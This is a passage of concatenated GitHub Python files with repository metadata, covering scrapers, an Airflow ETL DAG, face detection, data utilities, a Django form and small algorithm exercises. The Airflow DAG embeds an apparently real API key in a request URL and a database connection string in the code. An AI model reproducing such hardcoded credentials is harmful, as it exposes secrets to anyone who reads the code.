'&extensions=all&keywords=' + quote(\n        keywords) + '&city=' + quote(cityname) + '&citylimit=true' + '&offset=20' + '&page=' + str(\n        page) + '&output=json'\n    data = ''\n    with request.urlopen(req_url) as f:\n        data = f.read()\n        data = data.decode('utf-8')\n    return data\n \n \n# Fetch the categorised data for the city\npois = getpois(cityname, classfiled)\n \nprint('Write successful')\n","repo_name":"zhr0115/python","sub_path":"高德poi搜索.py","file_name":"高德poi搜索.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"2826989261","text":"import json\nimport psycopg2\nfrom psycopg2 import Error\nimport logging\nfrom airflow import DAG\nimport datetime as dt\nfrom textwrap import dedent\nimport requests as req\nfrom airflow.operators.python import PythonOperator\nfrom airflow.providers.postgres.operators.postgres import PostgresOperator\n\n# [START default_args]\n\ndefault_args = {\n    'owner': 'airflowproject',\n}\n# [END default_args]\n\n# [START instantiate_dag]\nwith DAG(\n    'final_project',\n    default_args=default_args,\n    description='ETL DAG',\n    schedule_interval=dt.timedelta(minutes=5),\n    start_date=dt.datetime(2022, 8, 5),\n    catchup=False,\n    tags=['test'],\n) as dag:\n    # [END instantiate_dag]\n    # [START documentation]\n    dag.doc_md = __doc__\n    # [END documentation]\n\n\n    # [START extract_function]\n\n    def data_load():\n        res = req.get('https://apidata.mos.ru/v1/datasets/60865/rows?api_key=65a059a358b2497d6c87224f9d783c85')\n        data = res.text\n\n        data = data.replace('}},','},#').replace('}}','}').replace('[','').replace(']','').replace('\"Cells\":{','').split(',#')\n        list_data =[]\n        for i in range(len(data)):\n            temp = json.loads(data[i])\n            key = 'uniq_key'\n            ts = dt.datetime.now()\n            value = str(temp.get(\"global_id\")) + \"|\" + str(ts)\n            temp[key] = value\n            key2 = 'processed_time'\n            temp[key2] = ts\n            list_data.append(temp)\n\n        connection = psycopg2.connect((\"\"\"\n            host=rc1b-tsmgwzxf6kio2ajk.mdb.yandexcloud.net\n            port=6432\n            dbname=stg\n            user=user1\n            password=put_your_password\n            target_session_attrs=read-write\n        \"\"\"))\n        cursor = connection.cursor()\n\n        def insert_database(uniq_key, processed_time, global_id, Number, NominationYear, Name, Author, PubYear, AgeLimit, PublishingHouse, LitPrizeName, Nomination): \n            \n            \n            insert_query = \"\"\" INSERT INTO stg_books (uniq_key, processed_time, global_id, number, nomitation_year, name, author, pub_year, age_limit, publishing_house, lit_prize_name, nomination) \n                    VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n\n            cursor.execute(insert_query, (uniq_key, processed_time, global_id, Number, NominationYear, Name, Author, PubYear, AgeLimit, PublishingHouse, LitPrizeName, Nomination))\n            connection.commit()\n        \n\n        for i in range(len(list_data)):\n            myjson = list_data[i]\n            insert_database(myjson['uniq_key'], myjson['processed_time'], myjson['global_id'], myjson['Number'], myjson['NominationYear'], myjson['Name'], myjson['Author'], myjson['PubYear'], myjson['AgeLimit'], myjson['PublishingHouse'], myjson['LitPrizeName'], myjson['Nomination'])\n\n        cursor.close()\n        connection.close()\n\n    # [START main_flow]\n    extract_task = PythonOperator(\n        task_id=\"data_load\",\n        python_callable=data_load)\n    \n# # [START main_flow]\n# load_task = PythonOperator(\n#     task_id=\"insert_database\",\n#         
python_callable=insert_database)\n\ndata_load\n","repo_name":"MissBlumarine/automatic_pipeline","sub_path":"1.final_project_airflow_dag.py","file_name":"1.final_project_airflow_dag.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13857899007","text":"import cv2\n\nclass ssdface():\n def __init__(self, framework='caffe', threshold=0.7):\n if framework == 'caffe':\n self.net = cv2.dnn.readNetFromCaffe('ssdface/deploy.prototxt', 'ssdface/res10_300x300_ssd_iter_140000_fp16.caffemodel')\n else:\n self.net = cv2.dnn.readNetFromTensorflow('ssdface/opencv_face_detector_uint8.pb', 'ssdface/opencv_face_detector.pbtxt')\n self.conf_threshold = threshold\n self.framework = framework\n def detect(self, frame):\n frameOpencvDnn = frame.copy()\n frameHeight = frameOpencvDnn.shape[0]\n frameWidth = frameOpencvDnn.shape[1]\n if self.framework == 'caffe':\n blob = cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300), [104, 117, 123], False, False)\n else:\n blob = cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300), [104, 117, 123], True, False)\n self.net.setInput(blob)\n detections = self.net.forward()\n face_rois = []\n for i in range(detections.shape[2]):\n confidence = detections[0, 0, i, 2]\n if confidence > self.conf_threshold:\n x1 = int(detections[0, 0, i, 3] * frameWidth)\n y1 = int(detections[0, 0, i, 4] * frameHeight)\n x2 = int(detections[0, 0, i, 5] * frameWidth)\n y2 = int(detections[0, 0, i, 6] * frameHeight)\n cv2.rectangle(frameOpencvDnn,(x1, y1), (x2, y2), (0, 0, 255), thickness=2)\n face_rois.append(frame[y1:y2, x1:x2])\n return frameOpencvDnn, face_rois\n def get_face(self, frame):\n frameOpencvDnn = frame.copy()\n frameHeight = frameOpencvDnn.shape[0]\n frameWidth = frameOpencvDnn.shape[1]\n if self.framework == 'caffe':\n blob = cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300), [104, 117, 123], False, False)\n else:\n blob = cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300), [104, 117, 123], True, False)\n self.net.setInput(blob)\n detections = self.net.forward()\n boxs, face_rois = [], []\n for i in range(detections.shape[2]):\n confidence = detections[0, 0, i, 2]\n if confidence > self.conf_threshold:\n x1 = int(detections[0, 0, i, 3] * frameWidth)\n y1 = int(detections[0, 0, i, 4] * frameHeight)\n x2 = int(detections[0, 0, i, 5] * frameWidth)\n y2 = int(detections[0, 0, i, 6] * frameHeight)\n boxs.append((x1, y1, x2, y2))\n face_rois.append(frame[y1:y2, x1:x2])\n return boxs, face_rois\n\nif __name__ == \"__main__\" :\n ssdface_detect = ssdface(framework='caffe')\n imgpath = 's_l.jpg'\n srcimg = cv2.imread(imgpath)\n drawimg, face_rois = ssdface_detect.detect(srcimg)\n\n # _, face_rois = ssdface_detect.get_face(srcimg)\n # print('detect', len(face_rois), 'face')\n # for i, face in enumerate(face_rois):\n # cv2.namedWindow('face' + str(i), cv2.WINDOW_NORMAL)\n # cv2.imshow('face' + str(i), face)\n\n cv2.namedWindow('detect', cv2.WINDOW_NORMAL)\n cv2.imshow('detect', drawimg)\n cv2.waitKey(0)\n cv2.destroyAllWindows()","repo_name":"hpc203/10kinds-light-face-detector-align-recognition","sub_path":"ssdface_detect_module.py","file_name":"ssdface_detect_module.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":381,"dataset":"github-code","pt":"40"} +{"seq_id":"38674989117","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom os import path\nimport os\nimport csv\n\n# Function to write the data to the 
appropriate filename\ndef write_to_csv(filename, data):\n\t#try statement to remove previous file before writing new file\n\ttry:\n\t\tos.remove(filename)\n\texcept OSError:\n\t\tpass\n\t\t\n\twith open(filename, 'a') as outcsv:\n\t\t#Specialized writer object to write to a csv file\n\t\twriter = csv.writer(outcsv, delimiter=',', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n\t\tfor row in data:\n\t\t\twriter.writerow(row)\n\toutcsv.close()\n\ndef extract_information(lines, year):\n\tspace_char = '\\xa0'\n\tdata = []\n\tcurrentCompany = \"\"\n\n\tnewLines = []\n\tfor line in lines:\n\t\tlineText = line.get_text()\n\t\tif lineText is not None:\n\t\t\tnewLines += lineText.split(\"\\n\")\n\n\tallRows = []\n\trow = ['State', 'StateAbbr', 'Year', 'Client', 'Lobbyist1', 'Lobbyist2', 'Lobbyist3', 'Lobbyist4', 'Lobbyist5', 'Lobbyist6', 'Lobbyist7', 'Lobbyist8', 'Lobbyist9', 'Lobbyist10', 'Lobbyist11', 'Lobbyist12']\t\t\n\tfor line in newLines:\n\t\tlistText = list(line)\n\t\tif len(listText) > 2:\n\t\t\tif listText[0] == space_char and (listText[1] != space_char and listText[1] != ' '):\n\t\t\t\tallRows.append(row)\n\t\t\t\tdel listText[0]\n\t\t\t\trow = [\"North Dakota\", \"ND\", year, \"\".join(listText)]\n\t\t\telif len(listText) > 11 and listText[10] == '#':\n\t\t\t\tname = \"\".join(listText[15:])\n\t\t\t\tname = name.replace('\\xa0', '')\n\t\t\t\tname = name.split(\", \")\n\n\t\t\t\tif len(name) < 2:\n\t\t\t\t\tname = \"\".join(name).split(\" \")\n\n\t\t\t\tif len(name) > 1:\n\t\t\t\t\trow.append(\"{} {}\".format(name[1], name[0]))\n\t\t\t\telse:\n\t\t\t\t\trow.append(name[0])\n\n\treturn allRows\n\n\nif __name__ == \"__main__\":\n\t#Years 2012-2016, add more if need be\n\tyears = [2012, 2013, 2014, 2015, 2016]\n\n\tfor year in years:\n\t\tif year == 2016: #handle special url for 2016\n\t\t\turl = \"http://sos.nd.gov/lobbyists/registered-lobbyists/2016-organizations-lobbyists\"\n\t\t\tresponse = requests.get(url)\n\n\t\t\tsoup = BeautifulSoup(response.content, 'lxml')\n\t\t\tallDivs = soup.find_all(\"div\", {'class':None, 'id':None})\n\t\t\tdata = extract_information(allDivs, year)\n\t\telse:\n\t\t\turl = \"http://sos.nd.gov/lobbyists/registered-lobbyists/{}-organizations-listed-alphabetically-lobbyists\".format(year)\n\t\t\tresponse = requests.get(url)\n\n\t\t\tsoup = BeautifulSoup(response.content, 'lxml')\n\t\t\tallPs = soup.find_all(\"p\")\n\t\t\tdel allPs[0] #remove the first element since it is a descriptor\n\t\t\tdata = extract_information(allPs, year)\n\t\twrite_to_csv(\"../ND_{}.csv\".format(year), data)\n\t\tprint(\"Finished {}!!\".format(year))\n\n\t\t\t","repo_name":"ridersofrohan/State-Lobbying","sub_path":"ND/Python Scripts/gather_data.py","file_name":"gather_data.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"29689208210","text":"import oy3opy.input as input\nfrom oy3opy.utils.string import string_width_fits\nfrom .core import View, Flow, Callable\n\nclass App(View):\n    def __init__(self, flow:Flow, window, y = 0, x = 0, height = None, width = None, offset = 0, fullscroll = True, bottomscroll = True, afterRender:Callable=None):\n        self.flow = flow\n\n        ymax, xmax = window.getmaxyx()\n        self.height = ymax if not height else height\n        self.width = xmax if not width else width\n        self.view = window.derwin(self.height, self.width, y, x)\n        self.view.keypad(True) \n\n        super().__init__(flow, self.height, offset)\n\n        self.__screen_curs_min_y, self.__screen_curs_min_x = 
self.view.getbegyx()\n        self.fullscroll = fullscroll\n        self.bottomscroll = bottomscroll\n        self.__stop = False\n        if self.fullscroll:\n            self.subscribe('full', lambda view: view.autoscroll())\n        \n        self.afterRender = afterRender\n\n    def listen(self):\n        input.onmouse(input.SCROLL_DOWN, self.handle_mouse)\n        input.onmouse(input.SCROLL_UP, self.handle_mouse)\n        self.subscribe('update', self.render)\n        self.__stop = False\n    def stop(self):\n        input.offmouse(input.SCROLL_DOWN, self.handle_mouse)\n        input.offmouse(input.SCROLL_UP, self.handle_mouse)\n        self.unsubscribe('update', self.render)\n        self.__stop = True\n    def render(self, *args):\n        if self.__stop:\n            return\n        if self.bottomscroll:\n            try:\n                self.scroll = ((len(self) == self.height) and (self.offset + len(self) == len(self.flow)))\n            except:\n                raise ValueError(f'{self.__len__()},{self.flow.__len__()}')\n\n        for i, item in enumerate(self.window()):\n            self.view.addstr(i, 0, string_width_fits(str(item), self.width - 1))\n            self.view.clrtoeol()\n        self.view.refresh()\n        self.afterRender()\n\n    def close(self):\n        self.view.erase()\n        self.view.refresh()\n\n    def handle_mouse(self, y, x, type):\n        if self.__stop:\n            return\n        if (self.__screen_curs_min_y <= y) and (y < self.__screen_curs_min_y+self.height) and (self.__screen_curs_min_x <= x) and (x < self.__screen_curs_min_x+self.width):\n            if type == input.SCROLL_DOWN:\n                self.curs_down()\n                self.render()\n            elif type == input.SCROLL_UP:\n                self.curs_up()\n                self.render()\n\n    def __enter__(self):\n        self.listen()\n        return self\n    \n    def __exit__(self, exc_type, exc_value, traceback):\n        self.stop()\n        self.close()\n","repo_name":"oy3o/dataflow","sub_path":"ternimal.py","file_name":"ternimal.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"40277755524","text":"import pandas as pd\nfrom functools import reduce\nimport numpy as np\nclass dataset:\n    def read_csv(csv_path):\n        df = pd.read_csv(csv_path,infer_datetime_format=True)\n        df_renamed = df.rename({'Reading Time (CST)':'Date'}, axis=1)\n        if '0 to 5 cm Depth Average WFV (%)' in df_renamed: \n            df_no_data_removed = df_renamed.loc[df_renamed['0 to 5 cm Depth Average WFV (%)'] != 'No Data']\n            df_no_data_removed['0 to 5 cm Depth Average WFV (%)'] = pd.to_numeric(df_no_data_removed['0 to 5 cm Depth Average WFV (%)'], \n                                                         downcast=\"float\",\n                                                         errors ='coerce')\n            df_no_data_removed = df_no_data_removed.rename({'0 to 5 cm Depth Average WFV (%)':'0-5cm Soil'},axis=1)\n\n        if '0-5 cm Depth Average WFV (%)' in df_renamed:\n            df_no_data_removed = df_renamed.loc[df_renamed['0-5 cm Depth Average WFV (%)'] != 'No Data']\n            df_no_data_removed['0-5 cm Depth Average WFV (%)'] = pd.to_numeric(df_no_data_removed['0-5 cm Depth Average WFV (%)'],\n                                                        downcast=\"float\",\n                                                        errors='coerce')\n            df_no_data_removed = df_no_data_removed.rename({'0-5 cm Depth Average WFV (%)':'0-5cm Soil'},axis=1)\n\n        df_no_data_removed['Date'] = pd.to_datetime(df_no_data_removed['Date'], \n                                infer_datetime_format=True\n                                )\n        return df_no_data_removed \n    \n    def get_soil_prep_date(csv_path,prename):\n        '''\n        returns soil, precipitation and date lists of 13 stations.\n        usage:\n        \n        csv_path = \"/Users/alperbalmumcu/Github/sen1-sen2-soil-moisture/RISMA/dataset/datasets/\"\n        prename = \"Manitoba_Station_\"\n        soil, prep, date = get_soil_prep_date(csv_path, prename)\n        '''\n        soil_list = []\n        prep_list = []\n        date_list = []\n        \n        for idx in range(1,14):\n            read_csv = dataset.read_csv(csv_path + prename + str(idx) + \".csv\")\n            
soil_list.append(read_csv['0-5cm Soil'])\n prep_list.append(read_csv['Precipitation Precip (mm)'])\n date_list.append(read_csv['Date'])\n \n return soil_list,prep_list,date_list\n \n def merge_datasets_wdates(date_list,soil_list,prep_list):\n '''\n inputs are date_list, soil_list and prep_list respectfully.\n returns merged dataframe.\n '''\n df_list = []\n for i in range(13):\n dfs = pd.DataFrame(list(zip(date_list[i],soil_list[i],prep_list[i])), \n columns= ['Date', f'Soil_{str(i+1)}',f'Prep_{str(i+1)}'])\n df_list.append(dfs)\n df_merged = reduce(lambda left,right: pd.merge(left,right,on=['Date'],\n how='outer'), df_list)\n df = df_merged.replace(np.nan,'',regex=True)\n df = df.replace('No Data', '')\n df = df.sort_values(by='Date')\n\n for i in range(1,14):\n df[f'Soil_{str(i)}'] = pd.to_numeric(df[f'Soil_{str(i)}'], downcast=\"float\")\n df[f'Prep_{str(i)}'] = pd.to_numeric(df[f'Prep_{str(i)}'], downcast=\"float\")\n\n df['Date'] = pd.to_datetime(df['Date'], infer_datetime_format=True) \n return df\n \n \n \n \n\n \n\n \n\n","repo_name":"abalmumcu/sen1-sen2-soil-moisture","sub_path":"RISMA/dataset/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41988657393","text":"def partition(array, low, high):\n \n\n pivot = array[high]\n \n\n i = low - 1\n \n\n for j in range(low, high):\n if array[j] <= pivot:\n\n i = i + 1\n\n (array[i], array[j]) = (array[j], array[i])\n \n # Swap the pivot element with \n # e greater element specified by i\n (array[i + 1], array[high]) = (array[high], array[i + 1])\n \n # Return the position from where partition is done\n return i + 1\n \n# Function to perform quicksort\n \n \ndef quick_sort(array, low, high):\n if low < high:\n \n # Find pivot element such that\n # element smaller than pivot are on the left\n # element greater than pivot are on the right\n pi = partition(array, low, high)\n \n # Recursive call on the left of pivot\n quick_sort(array, low, pi - 1)\n \n # Recursive call on the right of pivot\n quick_sort(array, pi + 1, high)\n \n \n# Driver code\narray = [103, 73, 83, 39, 31, 3]\nquick_sort(array, 0, len(array) - 1)\n \nprint(f'Sorted array: {array}')\n","repo_name":"alexenux/algorithm-collector","sub_path":"quick sort .py","file_name":"quick sort .py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70399166842","text":"from typing import Any, Dict, Union\n\nimport jax.numpy as jnp\nimport tensorflow_probability.substrates.jax as tfp\nfrom jax.tree_util import tree_map, tree_structure\n\nfrom gpfy.typing import BijectorDict, ConstantDict, TrainableDict, VariableDict\nfrom gpfy.utils import PyTreeNode, field\n\npositive = tfp.bijectors.Exp\nidentity = tfp.bijectors.Identity\n\n\nclass Param(PyTreeNode):\n \"\"\"\n Basic `PyTreeNode` that holds information regarding all the parameters of an initialised object.\n\n Attributes:\n params: A dictionary holding a collection of parameterised objects with a mapping to their\n parameters.\n _trainables: A dictionary with the same structure as `params` that specifies if a parameter\n is trainable or not. It defaults to `True` for all unspecified parameters.\n _bijectors: A dictionary with the same structure as `params` that specifies the required\n bijector to transform to the unconstrained space. 
It defaults to a positive\n `tfp.bijectors.Exp` for all unspecified parameters.\n constants: A dictionary that holds information for additional variables that are considered\n constant during optimisation.\n _constrained: A flag specifying if the parameters are constrained or not.\n\n Note that only the `params` attribute acts as a pytree_node.\n \"\"\"\n\n params: VariableDict = field(default_factory=dict, pytree_node=True)\n _trainables: TrainableDict = field(default_factory=dict, pytree_node=False)\n _bijectors: BijectorDict = field(default_factory=dict, pytree_node=False)\n constants: ConstantDict = field(default_factory=dict, pytree_node=False)\n _constrained: bool = field(default=True, pytree_node=False)\n\n def _has_valid_keys(self) -> None:\n \"\"\"\n Checks if the provided collections have the same structure as the `self.params`.\n\n Raises:\n ValueError: if the user specified `self._trainables is not a subtree of `self.params`.\n ValueError: if the user specified `self._bijectors is not a subtree of `self.params`.\n ValueError: if the user specified `self._constants has collections other than\n the ones in `self.params` or `\"sphere\"`.\n \"\"\"\n # valid_keys = set(self.params.keys())\n # param_tree = jax.tree_util.tree_flatten_with_path(self.params)[1]\n # trainables_tree = jax.tree_util.tree_flatten_with_path(self._trainables)[1]\n # bijectors_tree = jax.tree_util.tree_flatten_with_path(self._bijectors)[1]\n if not self._is_subtree(self._trainables, self.params):\n raise ValueError(\"Invalid key in `_trainables`\")\n if not self._is_subtree(self._bijectors, self.params):\n raise ValueError(\"Invalid key in `_bijectors`\")\n if not all(\n collection in self.params or collection == \"sphere\"\n for collection in self.constants.keys()\n ):\n raise ValueError(\"Invalid key in `_constants`\")\n\n def _is_subtree(self, t1: Union[VariableDict, Any], t2: Union[VariableDict, Any]) -> bool:\n \"\"\"\n Check if `t1` is subtree of `t2`, strating from the same level.\n\n Args:\n t1: a `VariableDict` pytree or a leaf node\n t2: a `VariableDict` pytree or a leaf node\n\n Returns:\n If `t1` is a subtree of `t2`.\n \"\"\"\n if isinstance(t1, Dict) and isinstance(t2, Dict):\n ret = []\n for k1 in t1.keys():\n if k1 in t2: # Check if a subtree of t1 has same structure as in t2\n ret.append(self._is_subtree(t1[k1], t2[k1]))\n else:\n return False\n return all(ret)\n elif isinstance(t2, Dict): # t1 is a leaf but t2 is a tree\n return False\n else: # both t1 and t2 are leaves\n return True\n\n def _tree_update_from_subtree(self, t1: VariableDict, t2: VariableDict) -> VariableDict:\n \"\"\"\n Update tree `t1` from subtree `t2`.\n\n Args:\n t1: a `VariableDict` pytree.\n t2: a `VariableDict` pytree.\n\n Returns:\n A `VariableDict` with the updated values.\n \"\"\"\n ret = {}\n for k1, v1 in t1.items():\n if k1 in t2: # k1 needs to be updated\n if isinstance(v1, Dict): # v1 is a tree so recurse\n ret[k1] = self._tree_update_from_subtree(t1[k1], t2[k1])\n else:\n ret[k1] = t2[k1] # we have a leaf so update the value\n else:\n if isinstance(v1, Dict): # check if t2 is a subtree of t1 so we need to recurse\n ret[k1] = self._tree_update_from_subtree(t1[k1], t2)\n else:\n ret[k1] = v1 # no update needed\n return ret\n\n def __post_init__(self) -> None:\n \"\"\"\n Runs automatically after the `__init__` of the dataclass to do further checks.\n \"\"\"\n # check we have valid keys in all dicts\n self._has_valid_keys()\n\n # initialise the trainable status to `True` for all unpsecified variables\n trainables = 
self._trainables\n if not trainables or (tree_structure(trainables) != tree_structure(self.params)):\n trainables = tree_map(lambda _: True, self.params)\n trainables = self._tree_update_from_subtree(trainables, self._trainables)\n\n # initialising the bijectors to `positive` for all unpsecified variables\n bijectors = self._bijectors\n if not bijectors or (\n tree_structure(bijectors, is_leaf=lambda x: isinstance(x, tfp.bijectors.Bijector))\n != tree_structure(self.params)\n ):\n bijectors = tree_map(lambda _: positive(), self.params)\n bijectors = self._tree_update_from_subtree(bijectors, self._bijectors)\n\n # make sure all params are Arrays with float64 dtype\n params = tree_map(lambda x: jnp.array(x, dtype=jnp.float64), self.params)\n\n # write back the modified `VariableDict`s\n object.__setattr__(self, \"params\", params)\n object.__setattr__(self, \"_trainables\", trainables)\n object.__setattr__(self, \"_bijectors\", bijectors)\n\n def replace_param(self, collection: str, **kwargs) -> \"Param\":\n \"\"\"\n Replace the value of parameters in the `VariableDict` from a specified `collection`.\n\n Args:\n collection: the name of the collection that holds the target variable.\n kwargs: The name and the new value of the target variables within the `collection`.\n\n Raises:\n ValueError: if the specified `collection` is not present in the `param` `VariableDict`.\n\n Returns:\n A new `Param` with the updated variables.\n \"\"\"\n if collection not in self.params:\n raise ValueError(f\"there is no {collection} collection\")\n\n # first update the subtree within the specified collection\n updates = self._tree_update_from_subtree(self.params[collection], kwargs)\n # then update the params with the newly updated collection\n updates = self._tree_update_from_subtree(self.params, updates)\n return self.replace(params=updates)\n\n def set_trainable(self, collection: str, **kwargs) -> \"Param\":\n \"\"\"\n Replace the trainable status of parameters in a specified `collection`.\n\n Args:\n collection: the name of the collection that holds the target variable.\n kwargs: The name and the new trainable status of the target variables within\n the `collection`.\n\n Raises:\n ValueError: if the specified `collection` is not present in the `param` `VariableDict`.\n\n Returns:\n A new `Param` with the updated trainable status of the variables.\n \"\"\"\n if collection not in self._trainables:\n raise ValueError(f\"there is no {collection} collection\")\n\n # first update the subtree within the specified collection\n updates = self._tree_update_from_subtree(self._trainables[collection], kwargs)\n # then update the trainables with the newly updated collection\n updates = self._tree_update_from_subtree(self._trainables, updates)\n return self.replace(_trainables=updates)\n\n def set_bijector(self, collection: str, **kwargs):\n \"\"\"\n Replace the bijector of parameters in a specified `collection`.\n\n Args:\n collection: the name of the collection that holds the target variable.\n kwargs: The name and the new bijector of the target variables within the `collection`.\n\n Raises:\n ValueError: if the specified `collection` is not present in the `param` `VariableDict`.\n\n Returns:\n A new `Param` with the updated bijectors of the variables.\n \"\"\"\n if collection not in self._trainables:\n raise ValueError(f\"there is no {collection} collection\")\n\n # first update the subtree within the specified collection\n updates = self._tree_update_from_subtree(self._bijectors[collection], kwargs)\n # then update the 
bijectors with the newly updated collection\n updates = self._tree_update_from_subtree(self._bijectors, updates)\n return self.replace(_bijectors=updates)\n\n def unconstrained(self) -> \"Param\":\n \"\"\"\n Move the `params` in the unconstrained (optimisation) space to optimise over them.\n\n NOTE: There is the logic to check if it is already unconstrained and return the same object,\n I just need to test it.\n\n Returns:\n The `Param` with the variables at the unconstrained space (the optimisation space).\n \"\"\"\n # if self._constrained:\n unconstrained_params = tree_map(lambda p, t: t.inverse(p), self.params, self._bijectors)\n return self.replace(_constrained=False, params=unconstrained_params)\n # else:\n # return self\n\n def constrained(self) -> \"Param\":\n \"\"\"\n Move the `params` in the (original) constrained space.\n\n NOTE: There is the logic to check if it is already unconstrained and return the same object,\n I just need to test it.\n\n Returns:\n The `Param` with the variables at the constrained space (the original space).\n \"\"\"\n # if not self._constrained:\n constrained_params = tree_map(lambda p, t: t.forward(p), self.params, self._bijectors)\n return self.replace(_constrained=True, params=constrained_params)\n # else:\n # return self\n","repo_name":"stefanosele/GPfY","sub_path":"src/gpfy/param.py","file_name":"param.py","file_ext":"py","file_size_in_byte":10603,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"3585765541","text":"# 2022/09/04 Baek 2630\n\nN = int(input())\ngraph = []\nfor _ in range(N):\n graph.append(list(map(int, input().split())))\n\ndef check(graph):\n global white_cnt, blue_cnt\n if graph[0][0] == 1:\n for row in range(len(graph)):\n for col in range(len(graph[0])):\n if graph[row][col] == 0:\n return False\n blue_cnt += 1\n return True\n else:\n for row in range(len(graph)):\n for col in range(len(graph[0])):\n if graph[row][col] == 1:\n return False\n white_cnt += 1\n return True\n\nwhite_cnt = 0\nblue_cnt = 0\n\ndef count_paper(graph):\n result = check(graph)\n if result == True:\n return\n count_paper([i[:len(graph)//2] for i in graph[:len(graph)//2]])\n count_paper([i[len(graph)//2:] for i in graph[:len(graph)//2]])\n count_paper([i[:len(graph)//2] for i in graph[len(graph)//2:]])\n count_paper([i[len(graph)//2:] for i in graph[len(graph)//2:]])\n\ncount_paper(graph)\nprint(white_cnt)\nprint(blue_cnt)\n","repo_name":"kkw2758/Algorithm","sub_path":"etc/baek_2630.py","file_name":"baek_2630.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34433878546","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom django import forms\nfrom django.forms import widgets\n\nfrom .models import author, type_book, publisher\n\n\nclass BookForm(forms.Form):\n name = forms.CharField(\n max_length=20,\n min_length=2,\n widget=widgets.TextInput( # 选择html控件\n attrs={\n 'class': 'form-control', # 设置控件属性,如设置class的样式\n 'placeholder': '书名',\n 'id': 'bookname',\n }\n )\n )\n\n publish_year = forms.DateField(\n widget=widgets.DateInput(\n attrs={\n 'placeholder': '出版日期:2017-01-01',\n 'class': 'form-control',\n 'id': 'publish_year',\n }\n ),\n )\n\n price = forms.IntegerField(\n widget=widgets.NumberInput(\n attrs={\n 'placeholder': '价格',\n 'class': 'form-control',\n 'id': 'price',\n }\n )\n )\n stock = forms.IntegerField(\n widget=widgets.NumberInput(\n attrs={\n 'placeholder': '库存',\n 'class': 
'form-control',\n 'id': 'stocks',\n }\n )\n )\n author = forms.MultipleChoiceField(\n choices=author.objects.all().values_list('id', 'name'), # 将queryset转换成list\n widget=widgets.SelectMultiple(\n attrs={\n 'id': 'demo-cs-multiselect',\n # 'value': '作者选择',\n }\n )\n )\n status = forms.ChoiceField(\n choices=[(1, '出版'), (2, '未出版'), ],\n widget=widgets.Select(\n attrs={\n 'type': 'select',\n 'class': 'magic-select',\n 'id': 'status',\n }\n )\n )\n\n type = forms.ChoiceField(\n choices=type_book.objects.all().values_list('id', 'typebook'),\n widget=widgets.Select(\n attrs={\n \"data-live-search\": \"true\",\n \"data-width\": \"100%\",\n 'class': 'selectpicker',\n 'id': 'type',\n }\n )\n )\n publisher = forms.ChoiceField(\n choices=publisher.objects.all().values_list('id', 'name'),\n widget=widgets.Select(\n attrs={\n 'class': 'selectpicker',\n 'data-live-search': 'True',\n 'data-width': '100%',\n 'id': 'publisher',\n }\n )\n )\n\n\nclass DetailForm(forms.Form):\n chapter = forms.IntegerField(\n widget=widgets.NumberInput(\n attrs={\n 'placeholder': '章节',\n 'class': 'form-control',\n 'id': 'chapter',\n }\n )\n )\n\n pages = forms.IntegerField(\n widget=widgets.NumberInput(\n attrs={\n 'placeholder': '页数',\n 'class': 'form-control',\n 'id': 'pages',\n }\n )\n )\n\n words = forms.IntegerField(\n widget=widgets.NumberInput(\n attrs={\n 'placeholder': '字数',\n 'class': 'form-control',\n 'id': 'words',\n }\n )\n )\n\n contentinfo = forms.CharField(\n widget=widgets.Textarea(\n attrs={\n 'rows': 8,\n 'placeholder': '图书简介',\n 'class': 'form-control',\n 'id': 'demo-textarea-input-1',\n }\n )\n )\n catalog = forms.CharField(\n widget=widgets.Textarea(\n attrs={\n 'rows': 8,\n 'placeholder': '目录',\n 'class': 'form-control',\n 'id': 'demo-textarea-input-2',\n }\n )\n )\n logo = forms.ImageField(\n allow_empty_file=True,\n widget=widgets.FileInput(\n attrs={\n 'id': 'logo_file',\n 'class': 'file-input-new btn btn-primary btn-file',\n 'style': \" margin: auto;\",\n 'required':'false',\n }\n )\n )\n","repo_name":"jxs1211/mybook","sub_path":"managerbook/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27040636744","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 8 15:33:06 2019\r\n\r\n@author: yanglei\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport time\r\nfrom keras.layers import Dense, Input\r\nfrom keras.models import Model\r\nimport sklearn.neighbors as skn\r\nfrom scipy.spatial.distance import cosine\r\nfrom scipy.io import loadmat,savemat\r\ntime_s=time.time()\r\n\r\ndef load_data():\r\n path='./dataset/mnist.npz'\r\n f=np.load(path)\r\n x_train,y_train=f['x_train'],f['y_train']\r\n x_test,y_test=f['x_test'],f['y_test']\r\n f.close() \r\n return (x_train,y_train),(x_test,y_test)\r\n\r\ndef re_measure(x_train,x_test):\r\n # create copies of the data\r\n 